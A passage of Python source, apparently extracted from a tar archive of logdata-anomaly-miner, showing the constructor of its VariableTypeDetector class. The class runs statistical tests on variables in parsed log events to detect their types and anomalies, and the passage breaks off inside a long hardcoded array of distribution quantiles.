bt_min_successes(self, num_BT, p, alpha): """ Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_BT is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = np.math.factorial(num_BT) i_factorial = 1 for i in range(num_BT + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * np.math.factorial(num_BT - i)) * ((1-p) ** i) * (p ** ( num_BT - i)) if tmp_sum > alpha: return num_BT-i return 0 VariableTypeDetector.py000066400000000000000000036363311437606560100354250ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for variable type. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import numpy as np import copy from scipy.stats import kstest, ks_2samp, norm, multinomial, distributions, chisquare import os import logging import sys import time from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class VariableTypeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """ This class tests each variable of the event_types for the implemented variable types. This module needs to run after the event type detector is initialized """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id='Default', target_path_list=None, used_gof_test='CM', gof_alpha=0.05, s_gof_alpha=0.05, s_gof_bt_alpha=0.05, d_alpha=0.1, d_bt_alpha=0.1, div_thres=0.3, sim_thres=0.1, indicator_thres=0.4, num_init=100, num_update=50, num_update_unq=200, num_s_gof_values=50, num_s_gof_bt=30, num_d_bt=30, num_pause_discrete=5, num_pause_others=2, test_gof_int=True, num_stop_update=False, silence_output_without_confidence=False, silence_output_except_indicator=True, num_var_type_hist_ref=10, num_update_var_type_hist_ref=10, num_var_type_considered_ind=10, num_stat_stop_update=200, num_updates_until_var_reduction=20, var_reduction_thres=0.6, num_skipped_ind_for_weights=1, num_ind_for_weights=100, used_multinomial_test='Chi', use_empiric_distr=True, used_range_test='MinMax', range_alpha=0.05, range_threshold=1, num_reinit_range=100, range_limits_factor=1, dw_alpha=0.05, save_statistics=True, output_logline=True, ignore_list=None, constraint_list=None, learn_mode=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of occurring events. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are @param used_gof_test states the used test statistic for the continuous data type. Implemented are the 'KS' and 'CM' tests. @param gof_alpha significance niveau for p-value for the distribution test of the initialization. Recomended values are the implemented values of crit_val_ini_ks and crit_val_upd_ks or _cm. @param s_gof_alpha significance niveau for p-value for the sliding KS-test in the update step. Recommended values are the implemented values of crit_val_upd_ks. @param s_gof_bt_alpha significance niveau for the binomial test of the test results of the s_gof-test. @param d_alpha significance niveau for the binomialtest of the single discrete variables. If used_multinomial_test == 'Approx' then faster runtime for values in the p list of bt_min_succ_data. @param d_bt_alpha significance niveau for the binomialtest of the test results of the discrete tests. @param div_thres threshold for diversity of the values of a variable (the higher the more values have to be distinct to be considered to be continuous distributed). @param sim_thres threshold for similarity of the values of a variable (the higher the more values have to be common to be considered discrete). @param indicator_thres threshold for the variable indicators to be used in the event indicator. @param num_init number of lines processed before detecting the variable types. Recommended values are the implemented values of crit_val_ini_ks and crit_val_upd_ks or _cm. @param num_update number of values for which the variable type is updated. If used_multinomial_test == 'Approx' then faster runtime for values in the p list of bt_min_succ_data. @param num_update_unq number of values for which the values of type unq is unique (the last num_update + num_update_unq values are unique). @param num_s_gof_values number of values which are tested in the s_gof-test. The value has to be <= num_init, >= num_update. Recommended values are the implemented values of crit_val_upd_ks. @param num_s_gof_bt number of tested s_gof-Tests for the binomialtest of the testresults of the s_gof tests. @param num_d_bt number of tested discrete samples for the binomial test of the test results of the discrete tests. @param num_pause_discrete number of paused updates, before the discrete var type is adapted. @param num_pause_others number of paused update runs, before trying to find a new var_type. @param test_gof_int states if integer number should be tested for the continuous variable type. @param num_stop_update stops updating the found variable types after num_stop_update processed lines. If False the updating of lines will not be stopped. @param silence_output_without_confidence silences the all messages without a confidence-entry. @param silence_output_except_indicator silences the all messages which are not related with the calculated indicator. @param num_var_type_hist_ref states how long the reference for the var_type_hist_ref is. The reference is used in the evaluation. @param num_update_var_type_hist_ref number of update steps before the var_type_hist_ref is being updated. @param num_var_type_considered_ind this attribute states how many variable types of the history are used as the recent history in the calculation of the indicator. False if no output of the indicator should be generated. @param num_stat_stop_update number of static values of a variable, to stop tracking the variable type and read in the ETD. False if not wanted. @param num_updates_until_var_reduction number of update steps until the variables are tested if they are suitable for an indicator. If not suitable, they are removed from the tracking of ETD (reduce checked variables). Equals 0 if disabled. @param var_reduction_thres threshold for the reduction of variable types. The most likely none others var type must have a higher relative appearance for the variable to be further checked. @param num_skipped_ind_for_weights number of the skipped indicators for the calculation of the indicator weights. @param num_ind_for_weights number of indicators used in the calculation of the indicator weights. @param used_multinomial_test states the used multinomial test. Allowed values are 'MT', 'Approx' and 'Chi', where 'MT' means original MT, 'Approx' is the approximation with single BTs and 'Chi' is the Chi-square test. @param use_empiric_distr states if empiric distributions of the variables should be used if no continuous distribution is detected. @param used_range_test states the used method of range estimation. Allowed values are 'MeanSD', 'EmpiricQuantiles' and 'MinMax'. Where 'MeanSD' means the estimation through mean and standard deviation, 'EmpiricQuantiles' estimation through the empirical quantiles and 'MinMax' the estimation through minimum and maximum. @param range_alpha significance niveau for the range variable type. @param range_threshold maximal proportional deviation from the range before the variable type is rejected. @param num_reinit_range number of update steps until the range variable type is reinitialized. Set to zero if not desired. @param range_limits_factor factor for the limits of the range variable type. @param dw_alpha significance niveau of the durbin watson test to test serial correlation. If the test fails the type range is assigned to the variable instead of continuous. @param save_statistics used to track the indicators and changed variable types. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id, target_path_list=target_path_list, used_gof_test=used_gof_test, gof_alpha=gof_alpha, s_gof_alpha=s_gof_alpha, s_gof_bt_alpha=s_gof_bt_alpha, d_alpha=d_alpha, d_bt_alpha=d_bt_alpha, div_thres=div_thres, sim_thres=sim_thres, indicator_thres=indicator_thres, num_init=num_init, num_update=num_update, num_update_unq=num_update_unq, num_s_gof_values=num_s_gof_values, num_s_gof_bt=num_s_gof_bt, num_d_bt=num_d_bt, num_pause_discrete=num_pause_discrete, num_pause_others=num_pause_others, test_gof_int=test_gof_int, num_stop_update=num_stop_update, silence_output_without_confidence=silence_output_without_confidence, silence_output_except_indicator=silence_output_except_indicator, num_var_type_hist_ref=num_var_type_hist_ref, num_update_var_type_hist_ref=num_update_var_type_hist_ref, num_var_type_considered_ind=num_var_type_considered_ind, num_stat_stop_update=num_stat_stop_update, num_updates_until_var_reduction=num_updates_until_var_reduction, var_reduction_thres=var_reduction_thres, num_skipped_ind_for_weights=num_skipped_ind_for_weights, num_ind_for_weights=num_ind_for_weights, used_multinomial_test=used_multinomial_test, use_empiric_distr=use_empiric_distr, used_range_test=used_range_test, range_alpha=range_alpha, range_threshold=range_threshold, num_reinit_range=num_reinit_range, range_limits_factor=range_limits_factor, dw_alpha=dw_alpha, save_statistics=save_statistics, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) # Initialization of variables, which are no input parameters # Saves the minimal number of successes for the BT for the s_gof-test self.s_gof_bt_min_success = self.bt_min_successes(self.num_s_gof_bt, 1 - self.s_gof_alpha, self.s_gof_bt_alpha) # Saves the minimal number of successes for the BT for discrete values self.d_bt_min_success = self.bt_min_successes(self.num_d_bt, 1 - self.d_alpha, self.d_bt_alpha) # Number of eventTypes self.num_events = 0 # Add the variable_type_detector to the list of the modules, which use the event_type_detector. self.event_type_detector.add_following_modules(self) # List of the numbers of variables of the eventTypes self.length = [] # Used to keep track of the indices of the variables if the target_path_list is not empty self.variable_path_num = [] # List of the found vartypes self.var_type = [] # Stores the alternative distribution types of continuous variables self.alternative_distribution_types = [] # Stores the values the betam and special distributions. The values are needed in the s_gof test self.distr_val = [] # List of the successes of the binomial test for the rejection in the s_gof or variables of discrete type self.bt_results = [] # List of the history of variable types of the single variables. The lists to the variables take the form # [others, static, [discrete, number of appended steps], asc, desc, unique, range, ev of continuous distributions] self.var_type_history_list = [] # Reference of a var_type_history_list. Used in the calculation of the indicator. self.var_type_history_list_reference = [] # Order of the var_type_history_list [others, static, [discrete, number of appended steps], asc, desc, unique, range, # ev of continuous distributions] self.var_type_history_list_order = ['others', 'stat', 'd', 'asc', 'desc', 'unq', 'range', 'cont'] # List of the distributions for which the s_gof test is implemented self.distr_list = ['nor', 'uni', 'spec', 'beta', 'betam', 'emp'] # List of the numbers of log lines of this eventType, when an indicator failed self.failed_indicators = [] # Stores the standardised values of all tested distributions for better performance. The list is hardcoded below self.quantiles = {} # Stores the number of minimal successes for the BT for selected sample-size and probabilities. self.bt_min_succ_data = {} self.log_success = 0 self.log_total = 0 self.log_new_learned = 0 self.log_new_learned_values = [] self.log_updated = 0 # Initialize lists used for the tracking of the indicator if self.save_statistics: self.statistics_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, 'statistics') # List of the numbers of total parsed log lines, when an indicator failed. Only used for the statistics self.failed_indicators_total = [] # List of the confidences of the indicators self.failed_indicators_values = [] # List of the paths of the indicators self.failed_indicators_paths = [] # List of the numbers of total parsed log lines, when a variable changed its type. Only used for the statistics self.changed_var_types = [] # Stores the standardised values of all tested distributions for better performance. self.quantiles = { 'spec': np.array([-1.8273443302401238,-1.7593797798616286,-1.709951015949996,-1.6790580385052258,-1.6543436565494094,-1.6296292745935932,-1.6110934881267307,-1.5925577016598689,-1.5740219151930066,-1.561664724215098,-1.5493075332371908,-1.5369503422592823,-1.5245931512813744,-1.512235960303466,-1.5060573648145121,-1.4937001738366036,-1.4875215783476496,-1.4751643873697418,-1.4689857918807874,-1.4628071963918334,-1.4566286009028795,-1.444271409924971,-1.438092814436017,-1.431914218947063,-1.4257356234581091,-1.4195570279691547,-1.4133784324802008,-1.4071998369912468,-1.401021241502293,-1.3948426460133383,-1.3886640505243844,-1.3824854550354304,-1.3763068595464765,-1.373217561801999,-1.370128264057522,-1.363949668568568,-1.357771073079614,-1.35159247759066,-1.3485031798461826,-1.3454138821017056,-1.3392352866127517,-1.3330566911237978,-1.3299673933793208,-1.3268780956348438,-1.3206995001458892,-1.3176102024014122,-1.3145209046569353,-1.3083423091679813,-1.3052530114235044,-1.3021637136790274,-1.295985118190073,-1.292895820445596,-1.289806522701119,-1.2836279272121651,-1.2805386294676881,-1.2774493317232112,-1.2743600339787335,-1.2712707362342566,-1.2650921407453026,-1.2620028430008257,-1.2589135452563487,-1.2558242475118717,-1.2527349497673947,-1.2496456520229173,-1.2465563542784404,-1.2434670565339634,-1.2403777587894864,-1.2341991633005323,-1.2311098655560553,-1.2280205678115783,-1.2249312700671011,-1.2218419723226241,-1.2187526745781472,-1.2156633768336702,-1.2125740790891932,-1.209484781344716,-1.206395483600239,-1.203306185855762,-1.2002168881112847,-1.1971275903668077,-1.1940382926223307,-1.1909489948778538,-1.1878596971333768,-1.1847703993888996,-1.1827108675592481,-1.1806513357295971,-1.1785918038999457,-1.175502506155469,-1.172413208410992,-1.169323910666515,-1.1662346129220378,-1.1631453151775606,-1.1600560174330836,-1.1569667196886066,-1.1538774219441297,-1.1518178901144782,-1.1497583582848272,-1.1476988264551757,-1.1446095287106988,-1.1415202309662216,-1.1384309332217442,-1.1353416354772672,-1.133282103647616,-1.1312225718179647,-1.1291630399883132,-1.1260737422438363,-1.1229844444993593,-1.120924912669708,-1.1188653808400566,-1.1168058490104051,-1.113716551265928,-1.110627253521451,-1.107537955776974,-1.104448658032497,-1.1023891262028456,-1.1003295943731946,-1.098270062543543,-1.0951807647990661,-1.092091467054589,-1.0900319352249375,-1.087972403395286,-1.0859128715656345,-1.0828235738211576,-1.0797342760766806,-1.0776747442470294,-1.0756152124173781,-1.0735556805877267,-1.0704663828432497,-1.0673770850987725,-1.065317553269121,-1.0632580214394698,-1.0611984896098183,-1.0591389577801669,-1.0570794259505158,-1.0550198941208644,-1.0519305963763874,-1.0488412986319104,-1.046781766802259,-1.0447222349726075,-1.0426627031429563,-1.0395734053984789,-1.036484107654002,-1.0344245758243507,-1.0323650439946994,-1.030305512165048,-1.0282459803353967,-1.0261864485057455,-1.024126916676094,-1.021037618931617,-1.0179483211871398,-1.0158887893574884,-1.0138292575278371,-1.0117697256981857,-1.0097101938685342,-1.0076506620388832,-1.0055911302092317,-1.0025018324647548,-0.9994125347202778,-0.9973530028906263,-0.995293471060975,-0.9932339392313235,-0.9911744074016722,-0.9891148755720207,-0.9870553437423694,-0.9839660459978924,-0.9808767482534154,-0.978817216423764,-0.9767576845941128,-0.9746981527644615,-0.97263862093481,-0.9705790891051587,-0.9685195572755072,-0.96543025953103,-0.962340961786553,-0.9602814299569016,-0.9582218981272504,-0.9561623662975991,-0.9541028344679476,-0.9520433026382965,-0.9499837708086452,-0.9468944730641682,-0.9438051753196909,-0.9417456434900395,-0.9396861116603881,-0.9376265798307367,-0.9355670480010853,-0.9335075161714341,-0.9314479843417828,-0.9283586865973058,-0.9252693888528288,-0.9232098570231774,-0.921150325193526,-0.9190907933638746,-0.9170312615342232,-0.9149717297045717,-0.9129121978749204,-0.9098229001304434,-0.9067336023859665,-0.904674070556315,-0.9026145387266639,-0.9005550068970124,-0.898495475067361,-0.8964359432377096,-0.8943764114080582,-0.891287113663581,-0.888197815919104,-0.8861382840894528,-0.8840787522598015,-0.8820192204301504,-0.878929922685673,-0.8758406249411961,-0.8737810931115447,-0.8717215612818936,-0.8696620294522421,-0.8676024976225908,-0.8655429657929393,-0.863483433963288,-0.860394136218811,-0.857304838474334,-0.8552453066446826,-0.8531857748150312,-0.8511262429853798,-0.8490667111557284,-0.8470071793260773,-0.8449476474964258,-0.8418583497519488,-0.8387690520074716,-0.8367095201778202,-0.8346499883481691,-0.8325904565185177,-0.8305309246888662,-0.8284713928592149,-0.8264118610295634,-0.8233225632850865,-0.8202332655406095,-0.8181737337109581,-0.8161142018813067,-0.8140546700516553,-0.8119951382220039,-0.8099356063923527,-0.8078760745627014,-0.8047867768182241,-0.8016974790737471,-0.7996379472440958,-0.7975784154144446,-0.7955188835847932,-0.7934593517551418,-0.7913998199254904,-0.789340288095839,-0.786250990351362,-0.7831616926068851,-0.7811021607772336,-0.7790426289475822,-0.7769830971179308,-0.7749235652882794,-0.7728640334586283,-0.7708045016289768,-0.7677152038844999,-0.7646259061400227,-0.7625663743103712,-0.7605068424807201,-0.7584473106510687,-0.7553580129065914,-0.7522687151621145,-0.7502091833324631,-0.748149651502812,-0.7460901196731605,-0.7440305878435092,-0.7419710560138577,-0.7399115241842064,-0.7368222264397294,-0.7337329286952524,-0.731673396865601,-0.7296138650359496,-0.7275543332062981,-0.7254948013766468,-0.7234352695469957,-0.7213757377173442,-0.7182864399728672,-0.71519714222839,-0.7131376103987386,-0.7110780785690874,-0.7090185467394361,-0.7069590149097846,-0.7048994830801333,-0.7028399512504818,-0.6997506535060048,-0.6966613557615279,-0.6946018239318765,-0.6925422921022254,-0.6904827602725739,-0.687393462528097,-0.6843041647836198,-0.6822446329539683,-0.6801851011243172,-0.6781255692946658,-0.6760660374650144,-0.674006505635363,-0.6719469738057116,-0.6688576760612346,-0.6657683783167576,-0.6637088464871063,-0.6616493146574548,-0.6595897828278035,-0.6565004850833265,-0.6534111873388495,-0.651351655509198,-0.6492921236795467,-0.6472325918498952,-0.645173060020244,-0.6431135281905925,-0.6410539963609413,-0.6379646986164642,-0.6348754008719871,-0.6328158690423358,-0.6307563372126844,-0.6286968053830332,-0.625607507638556,-0.6225182098940789,-0.6204586780644277,-0.6183991462347762,-0.616339614405125,-0.6142800825754736,-0.6122205507458222,-0.6101610189161708,-0.6070717211716938,-0.6039824234272169,-0.6019228915975654,-0.599863359767914,-0.5978038279382626,-0.5947145301937856,-0.5916252324493086,-0.5895657006196572,-0.5875061687900058,-0.5854466369603544,-0.5833871051307031,-0.5813275733010518,-0.5792680414714004,-0.5761787437269233,-0.5730894459824463,-0.571029914152795,-0.5689703823231436,-0.5669108504934923,-0.5638215527490152,-0.560732255004538,-0.5586727231748868,-0.5566131913452355,-0.5545536595155841,-0.551464361771107,-0.5483750640266299,-0.5463155321969787,-0.5442560003673272,-0.542196468537676,-0.5401369367080245,-0.5380774048783732,-0.5360178730487217,-0.5329285753042448,-0.5298392775597678,-0.5277797457301164,-0.525720213900465,-0.5236606820708136,-0.5205713843263367,-0.5174820865818597,-0.5154225547522082,-0.5133630229225569,-0.5113034910929054,-0.5082141933484284,-0.5051248956039515,-0.5030653637743001,-0.5010058319446486,-0.4989463001149973,-0.49585700237052033,-0.49276770462604347,-0.49070817279639206,-0.4886486409667408,-0.4865891091370894,-0.48349981139261244,-0.4804105136481353,-0.4783509818184839,-0.47629144998883266,-0.47423191815918125,-0.47217238632952985,-0.47011285449987855,-0.46805332267022715,-0.46496402492575006,-0.4618747271812731,-0.4598151953516217,-0.4577556635219704,-0.455696131692319,-0.4526068339478419,-0.44951753620336493,-0.4474580043737135,-0.44539847254406223,-0.4433389407144108,-0.4402496429699337,-0.4371603452254567,-0.4351008133958053,-0.43304128156615407,-0.43098174973650266,-0.4278924519920255,-0.42480315424754855,-0.42274362241789715,-0.4206840905882459,-0.4186245587585945,-0.41553526101411736,-0.4124459632696404,-0.410386431439989,-0.40832689961033775,-0.40626736778068634,-0.4031780700362092,-0.40008877229173223,-0.3980292404620808,-0.3959697086324296,-0.3939101768027782,-0.39082087905830104,-0.38773158131382407,-0.38567204948417266,-0.3836125176545214,-0.38155298582487,-0.3784636880803929,-0.3753743903359159,-0.37228509259143894,-0.36919579484696186,-0.36713626301731045,-0.36507673118765915,-0.36301719935800775,-0.3599279016135308,-0.3568386038690537,-0.3547790720394023,-0.352719540209751,-0.3506600083800996,-0.3475707106356226,-0.34448141289114553,-0.3424218810614941,-0.34036234923184283,-0.3383028174021914,-0.33521351965771445,-0.33212422191323737,-0.33006469008358597,-0.32800515825393467,-0.32594562642428326,-0.3228563286798063,-0.3197670309353292,-0.3177074991056778,-0.3156479672760265,-0.3135884354463751,-0.31049913770189813,-0.30740983995742105,-0.3043205422129441,-0.3012312444684671,-0.2991717126388157,-0.2971121808091644,-0.295052648979513,-0.29196335123503603,-0.2888740534905589,-0.2868145216609075,-0.28475498983125624,-0.28269545800160484,-0.27960616025712787,-0.27651686251265073,-0.27342756476817365,-0.2703382670236967,-0.26827873519404527,-0.266219203364394,-0.26415967153474257,-0.2610703737902655,-0.2579810760457885,-0.2559215442161371,-0.2538620123864858,-0.2518024805568344,-0.24871318281235733,-0.24562388506788035,-0.24253458732340338,-0.23944528957892627,-0.23738575774927487,-0.2353262259196236,-0.2332666940899722,-0.23017739634549522,-0.2270880986010181,-0.223998800856541,-0.22090950311206403,-0.21884997128241263,-0.21679043945276136,-0.21473090762310995,-0.21164160987863284,-0.20855231213415587,-0.20649278030450446,-0.20443324847485317,-0.20237371664520176,-0.19928441890072465,-0.19619512115624768,-0.1931058234117707,-0.1900165256672936,-0.1879569938376422,-0.18589746200799093,-0.18383793017833952,-0.18074863243386255,-0.17765933468938544,-0.17457003694490833,-0.17148073920043136,-0.16942120737077995,-0.16736167554112868,-0.16530214371147728,-0.1622128459670003,-0.15912354822252334,-0.15603425047804623,-0.15294495273356926,-0.15088542090391785,-0.14882588907426658,-0.14676635724461518,-0.14367705950013807,-0.1405877617556611,-0.13749846401118412,-0.13440916626670701,-0.1313198685222299,-0.12823057077775293,-0.12617103894810153,-0.12411150711845026,-0.12205197528879885,-0.11896267754432174,-0.11587337979984477,-0.1127840820553678,-0.10969478431089069,-0.10763525248123929,-0.10557572065158802,-0.10351618882193661,-0.10042689107745964,-0.09733759333298253,-0.09424829558850542,-0.09115899784402844,-0.08806970009955147,-0.08498040235507436,-0.08292087052542295,-0.08086133869577168,-0.07880180686612027,-0.0757125091216433,-0.0726232113771662,-0.06953391363268908,-0.06644461588821211,-0.06335531814373514,-0.06026602039925803,-0.058206488569606626,-0.05614695673995536,-0.05408742491030395,-0.05099812716582691,-0.04790882942134987,-0.04481953167687283,-0.04173023393239579,-0.03864093618791875,-0.03555163844344171,-0.03246234069896467,-0.029373042954487626,-0.02731351112483629,-0.025253979295184883,-0.023194447465533546,-0.020105149721056502,-0.01701585197657946,-0.013926554232102421,-0.010837256487625381,-0.00774795874314834,-0.0046586609986712995,-0.0015693632541942586,0.0015199344902827824,0.00357946631993412,0.005638998149585526,0.007698529979236864,0.010787827723713905,0.013877125468190945,0.016966423212667985,0.020055720957145026,0.02314501870162207,0.02623431644609911,0.02932361419057615,0.03241291193505319,0.03550220967953016,0.03859150742400713,0.04168080516848417,0.04477010291296122,0.04682963474261256,0.04888916657226396,0.0509486984019153,0.05403799614639234,0.05712729389086938,0.06021659163534642,0.06330588937982347,0.06639518712430051,0.06948448486877755,0.07257378261325459,0.07566308035773163,0.07875237810220867,0.08184167584668571,0.08493097359116275,0.08802027133563979,0.09110956908011683,0.09419886682459387,0.09625839865424521,0.09831793048389662,0.10037746231354795,0.10346676005802499,0.10655605780250203,0.10964535554697907,0.11273465329145611,0.11582395103593315,0.1189132487804102,0.12200254652488723,0.1250918442693643,0.12818114201384126,0.13127043975831829,0.13435973750279534,0.13744903524727237,0.14053833299174942,0.14362763073622645,0.1467169284807035,0.14980622622518053,0.15289552396965758,0.1559848217141346,0.15907411945861166,0.1621634172030887,0.16525271494756574,0.16834201269204277,0.17143131043651982,0.17452060818099685,0.1776099059254739,0.18069920366995093,0.18378850141442798,0.18687779915890504,0.18996709690338207,0.19305639464785912,0.19614569239233615,0.1992349901368132,0.20232428788129023,0.2054135856257672,0.20850288337024425,0.21159218111472128,0.21468147885919833,0.21777077660367536,0.2208600743481524,0.22394937209262944,0.2270386698371065,0.23012796758158352,0.23321726532606057,0.2363065630705376,0.23939586081501465,0.24248515855949168,0.24557445630396874,0.24866375404844576,0.2517530517929228,0.25484234953739987,0.2579316472818769,0.2610209450263539,0.264110242770831,0.26719954051530803,0.27028883825978506,0.2733781360042621,0.27646743374873917,0.2795567314932162,0.2826460292376932,0.28573532698217025,0.29191392247112435,0.2950032202156014,0.2980925179600784,0.30118181570455543,0.30427111344903246,0.3073604111935095,0.3104497089379865,0.31353900668246354,0.3166283044269406,0.31971760217141765,0.3228068999158947,0.3258961976603717,0.3289854954048488,0.3320747931493258,0.33516409089380284,0.34134268638275694,0.34443198412723397,0.34752128187171094,0.3506105796161881,0.35369987736066505,0.35678917510514213,0.3598784728496191,0.36296777059409624,0.3660570683385732,0.3691463660830503,0.37223566382752726,0.37841425931648137,0.3815035570609584,0.3845928548054354,0.38768215254991245,0.39077145029438953,0.39386074803886656,0.3969500457833436,0.4000393435278206,0.4031286412722977,0.40930723676125175,0.4123965345057288,0.41548583225020586,0.4185751299946829,0.4216644277391599,0.424753725483637,0.427843023228114,0.43402161871706807,0.43711091646154504,0.4402002142060222,0.44328951195049915,0.44637880969497623,0.4494681074394532,0.45255740518393034,0.45873600067288434,0.46182529841736136,0.46491459616183844,0.46800389390631547,0.4710931916507925,0.4741824893952695,0.4772717871397466,0.48345038262870066,0.4865396803731777,0.48962897811765477,0.4927182758621318,0.4958075736066088,0.5019861690955629,0.50507546684004,0.508164764584517,0.5112540623289941,0.514343360073471,0.5205219555624251,0.5236112533069022,0.5267005510513791,0.5297898487958562,0.5328791465403333,0.5390577420292874,0.5421470397737643,0.5452363375182414,0.5483256352627185,0.5514149330071955,0.5575935284961496,0.5606828262406266,0.5637721239851037,0.5668614217295807,0.5699507194740577,0.5761293149630118,0.5792186127074889,0.582307910451966,0.58848650594092,0.5915758036853971,0.594665101429874,0.5977543991743511,0.6008436969188281,0.6070222924077823,0.6101115901522592,0.6132008878967362,0.6193794833856904,0.6224687811301673,0.6255580788746444,0.6317366743635986,0.6348259721080756,0.6379152698525525,0.6440938653415067,0.6471831630859837,0.6502724608304606,0.6533617585749378,0.6564510563194148,0.6626296518083689,0.6657189495528459,0.6688082472973229,0.674986842786277,0.6780761405307542,0.6811654382752311,0.6873440337641852,0.6904333315086623,0.6935226292531392,0.6997012247420933,0.7058798202310475,0.7089691179755245,0.7120584157200015,0.7182370112089556,0.7213263089534326,0.7244156066979096,0.7305942021868638,0.7336834999313409,0.7367727976758178,0.7429513931647719,0.746040690909249,0.7491299886537259,0.7553085841426801,0.7614871796316341,0.7645764773761111,0.7676657751205882,0.7738443706095423,0.7769336683540192,0.7800229660984964,0.7862015615874505,0.7923801570764044,0.7954694548208815,0.7985587525653586,0.8047373480543126,0.8078266457987897,0.8109159435432668,0.8170945390322207,0.823273134521175,0.826362432265652,0.829451730010129,0.835630325499083,0.8418089209880371,0.844898218732514,0.8479875164769911,0.8541661119659453,0.8603447074548993,0.8634340051993764,0.8665233029438534,0.8727018984328074,0.8788804939217616,0.8850590894107156,0.8881483871551927,0.8912376848996697,0.8974162803886238,0.9035948758775779,0.9066841736220549,0.909773471366532,0.915952066855486,0.9221306623444401,0.9283092578333942,0.9313985555778712,0.9344878533223482,0.9406664488113023,0.9468450443002563,0.9530236397892106,0.9561129375336875,0.9592022352781645,0.9653808307671187,0.9715594262560726,0.9777380217450269,0.9839166172339808,0.9870059149784579,0.990095212722935,0.9962738082118889,1.002452403700843,1.008630999189797,1.0148095946787512,1.0209881901677054,1.0271667856566593,1.0302560834011365,1.0333453811456135,1.0395239766345676,1.0457025721235216,1.0518811676124757,1.0580597631014297,1.0642383585903838,1.070416954079338,1.076595549568292,1.0796848473127691,1.0827741450572461,1.0889527405462003,1.0951313360351542,1.1013099315241082,1.1074885270130623,1.1136671225020165,1.1198457179909704,1.1260243134799246,1.1322029089688785,1.1383815044578327,1.1445600999467869,1.1507386954357408,1.156917290924695,1.1630958864136491,1.169274481902603,1.1754530773915572,1.1816316728805112,1.1878102683694653,1.1939888638584195,1.2001674593473735,1.2063460548363276,1.2125246503252818,1.2187032458142357,1.2248818413031899,1.2310604367921438,1.237239032281098,1.243417627770052,1.249596223259006,1.2557748187479605,1.2619534142369144,1.2681320097258684,1.2743106052148225,1.2804892007037767,1.2866677961927306,1.2990249871706385,1.3052035826595927,1.311382178148547,1.317560773637501,1.323739369126455,1.3299179646154091,1.3360965601043633,1.3484537510822712,1.3546323465712253,1.3608109420601797,1.3669895375491337,1.3731681330380876,1.3793467285270418,1.3917039195049499,1.3978825149939038,1.404061110482858,1.4102397059718124,1.4225968969497202,1.4287754924386744,1.4349540879276284,1.4411326834165825,1.4534898743944904,1.4596684698834448,1.465847065372399,1.4782042563503068,1.484382851839261,1.4905614473282152,1.502918638306123,1.5090972337950774,1.5152758292840316,1.5276330202619395,1.5338116157508936,1.5461688067288017,1.5523474022177557,1.5647045931956642,1.5708831886846182,1.5832403796625263,1.5894189751514805,1.6017761661293883,1.6079547616183427,1.6203119525962508,1.6264905480852048,1.6388477390631127,1.645026334552067,1.657383525529975,1.6697407165078835,1.6759193119968374,1.6882765029747453,1.6944550984636997,1.7068122894416076,1.7191694804195161,1.731526671397424,1.737705266886378,1.7500624578642865,1.7624196488421944,1.7747768398201027,1.7871340307980106,1.7994912217759191,1.805669817264873,1.8180270082427814,1.8303841992206893,1.8427413901985972,1.8550985811765057,1.8674557721544136,1.879812963132322,1.8983487495991844,1.9107059405770923,1.9230631315550006,1.9354203225329085,1.947777513510817,1.966313299977679,1.9786704909555872,1.991027681933495,2.0095634684003576,2.0219206593782655,2.0404564458451278,2.052813636823036,2.071349423289898,2.0898852097567606,2.102242400734669,2.1207781872015308,2.139313973668393,2.1578497601352553,2.176385546602118,2.19492133306898,2.213457119535842,2.2319929060027044,2.2567072879585206,2.2752430744253833,2.293778860892245,2.3184932428480614,2.3432076248038776,2.3679220067596938,2.3926363887155104,2.4173507706713266,2.442065152627143,2.4729581300719135,2.4976725120277297,2.5285654894725,2.55945846691727,2.590351444362041,2.627423017295765,2.66449459022949,2.701566163163214,2.744816331585892,2.788066500008571,2.8374952639202036,2.8869240278318364,2.942531387232423,3.004317342121964,3.072281892500459,3.1464250383679073,3.2391039707022187,3.344140094014438,3.473890599282474,3.646891272973188]), # skipcq: FLK-E231, FLK-E501 'betam1': 